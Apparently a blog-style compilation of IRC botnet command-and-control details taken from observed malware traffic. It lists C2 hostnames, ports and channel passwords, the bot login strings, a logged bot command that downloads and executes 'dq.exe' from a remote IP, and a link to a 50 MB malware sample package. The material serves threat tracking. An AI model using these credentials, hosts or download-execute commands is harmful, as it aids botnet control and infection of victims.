Remote Host                     Port Number
jky.no-ip.info                  3177 (RAT here)
main.xxxxxiseviumixxxxx.info    3211 (IRCD here)

NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453

Hosting info: http://whois.domaintools.com/88.198.219.113
95.173.179.231 (IRC botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)

Remote Host       Port Number
95.173.179.231    6667

PASS codr00t
MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME

Hosting info: http://whois.domaintools.com/95.173.179.231
01.cybernix.info (IRC botnet hosted in United States Willowbrook Psinet Inc)

Remote Host         Port Number
01.cybernix.info    1750

PASS gsaxx00
NICK 0USA9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK 0USAiky784di69

Hosting info: http://whois.domaintools.com/154.35.64.32
46.243.8.119 (IRC botnet hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host                     Port Number
ircserver.taylor412gang.com     3941

NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57

Hosting info: http://whois.domaintools.com/46.243.8.119
ashland.aboutkiddies.com (IRC botnet hosted in United States New York Webair Internet Development Company Inc)

Remote Host       Port Number
209.200.50.75     3800   PASS hax0r
213.251.170.52    80
91.200.241.40     80

The data identified by the following URLs was then requested from the remote web server:
- http://api.wipmania.com/
- http://91.200.241.40/dq.exe

PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0

PASS hax0r..KCIK 00000010 | 206E 7B55 537C 5850
homelessman.weedns.com (Mouse’s botnet hosted in the whole world lol)

This is probably one of the biggest botnets, still alive for years now.

DNS: homelessman.weedns.com
Port: 3305

Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To [92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]

DNS List:
ns.yumetairiku.co.jp:3305
virtual-mgsf.nebula.fi:3305
dell.aurius.sk:3305
cx10man.weedns.com:3305
fx010413.whyI.org:3305
gynoman.weedns.com:3305
c010x1.co.cc:3305
commgr.co.cc:3305
g.0x20.biz:3305
telephone.dd.blueline.be:3305
cx10man.weedns.com:3305
gynoman.weedns.com:3305
www.carpet-backing.com
www.comofil.it
www.iris-spa.it
www.osteriadeltorchio.it
ballslessman.weedns.com:3305
fx010413.whyi.org:3305
toxfeenyxx.sdeirc.net (phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host              Port Number
toxfeenyxx.sdeirc.net    3674

NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer

Hosting info: http://whois.domaintools.com/46.243.8.142
50 MB malware samples

This is another package with different malware samples, have fun.
Size: 50 MB
Download: http://c65cdb0b.tubeviral.com
75.102.22.40 (IRC botnet hosted in United States Chicago Hostforweb Inc)

Remote Host       Port Number
195.122.131.8     80
204.0.5.41        80
63.135.80.224     80
63.135.80.46      80
66.220.158.11     80
75.102.22.40      2866

PASS xxx
NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD

Hosting info: http://whois.domaintools.com/75.102.22.40
infected34.co.cc (IRC botnet hosted in Germany Berlin Fast It Colocation)

IRCD: infected34.co.cc:6667

PASS timu or PASS aliss
NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu
MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME

Hosting info: http://whois.domaintools.com/217.79.190.39